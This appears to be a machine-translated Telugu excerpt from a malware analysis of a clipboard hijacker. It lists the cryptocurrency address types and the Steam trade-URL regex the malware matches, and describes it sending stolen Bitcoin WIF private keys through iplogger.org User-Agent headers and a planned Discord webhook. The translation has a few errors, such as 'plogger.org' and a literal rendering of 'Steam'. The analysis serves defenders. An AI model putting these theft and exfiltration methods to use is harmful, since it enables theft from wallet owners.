BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL

ప్రతి రకమైన చిరునామాకు సంబంధిత సాధారణ వ్యక్తీకరణ ఉంటుంది. STEAM_URL విలువ ఆవిరి సిస్టమ్‌పై దాడి చేయడానికి ఉపయోగించబడుతుంది, బఫర్‌లో నిర్వచించడానికి ఉపయోగించే సాధారణ వ్యక్తీకరణ నుండి చూడవచ్చు:

b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b

ఎక్స్‌ఫిల్ట్రేషన్ ఛానల్

బఫర్‌లోని చిరునామాలను భర్తీ చేయడంతో పాటు, మాల్వేర్ Bitcoin, Bitcoin కోర్ మరియు Electrum Bitcoin వాలెట్ల ప్రైవేట్ WIF కీలను లక్ష్యంగా చేసుకుంటుంది. ప్రోగ్రామ్ WIF ప్రైవేట్ కీని పొందేందుకు plogger.orgని ఎక్స్‌ఫిల్ట్రేషన్ ఛానెల్‌గా ఉపయోగిస్తుంది. దీన్ని చేయడానికి, దిగువ చూపిన విధంగా, ఆపరేటర్‌లు వినియోగదారు-ఏజెంట్ HTTP హెడర్‌కు ప్రైవేట్ కీ డేటాను జోడిస్తారు.

మూర్తి 4. అవుట్‌పుట్ డేటాతో IP లాగర్ కన్సోల్.

ఆపరేటర్లు వాలెట్లను వెలికితీసేందుకు iplogger.orgని ఉపయోగించలేదు. ఫీల్డ్‌లో 255 అక్షరాల పరిమితి కారణంగా వారు బహుశా వేరే పద్ధతిని ఆశ్రయించారు User-AgentIP లాగర్ వెబ్ ఇంటర్‌ఫేస్‌లో ప్రదర్శించబడుతుంది. మేము అధ్యయనం చేసిన నమూనాలలో, ఇతర అవుట్‌పుట్ సర్వర్ పర్యావరణ వేరియబుల్‌లో నిల్వ చేయబడింది DiscordWebHook. ఆశ్చర్యకరంగా, ఈ ఎన్విరాన్మెంట్ వేరియబుల్ కోడ్‌లో ఎక్కడా కేటాయించబడలేదు. మాల్వేర్ ఇంకా అభివృద్ధిలో ఉందని మరియు ఆపరేటర్ యొక్క పరీక్ష యంత్రానికి వేరియబుల్ కేటాయించబడిందని ఇది సూచిస్తుంది.

కార్యక్రమం అభివృద్ధిలో ఉందని మరొక సంకేతం ఉంది. బైనరీ ఫైల్‌లో రెండు iplogger.org URLలు ఉన్నాయి మరియు డేటా ఎక్స్‌ఫిల్ట్ చేయబడినప్పుడు రెండూ ప్రశ్నించబడతాయి. ఈ URLలలో ఒకదానికి చేసిన అభ్యర్థనలో, రెఫరర్ ఫీల్డ్‌లోని విలువకు ముందు “DEV /” ఉంటుంది. మేము ConfuserExని ఉపయోగించి ప్యాక్ చేయని సంస్కరణను కూడా కనుగొన్నాము, ఈ URL గ్రహీత పేరు DevFeedbackUrl. ఎన్విరాన్‌మెంట్ వేరియబుల్ పేరు ఆధారంగా, క్రిప్టోకరెన్సీ వాలెట్‌లను దొంగిలించడానికి ఆపరేటర్‌లు చట్టబద్ధమైన సర్వీస్ డిస్కార్డ్ మరియు దాని వెబ్ ఇంటర్‌సెప్షన్ సిస్టమ్‌ను ఉపయోగించాలని ప్లాన్ చేస్తున్నారని మేము విశ్వసిస్తున్నాము.

తీర్మానం

సైబర్ దాడులలో చట్టబద్ధమైన ప్రకటనల సేవల వినియోగానికి ఈ ప్రచారం ఒక ఉదాహరణ. ఈ పథకం రష్యన్ సంస్థలను లక్ష్యంగా చేసుకుంటుంది, అయితే రష్యాయేతర సేవలను ఉపయోగించి అటువంటి దాడిని చూసి మేము ఆశ్చర్యపోము. రాజీని నివారించడానికి, వినియోగదారులు తాము డౌన్‌లోడ్ చేసే సాఫ్ట్‌వేర్ యొక్క మూలం యొక్క కీర్తిపై నమ్మకంగా ఉండాలి.

రాజీ మరియు MITER ATT&CK లక్షణాల యొక్క పూర్తి జాబితా ఇక్కడ అందుబాటులో ఉంది లింక్.

మూలం: www.habr.com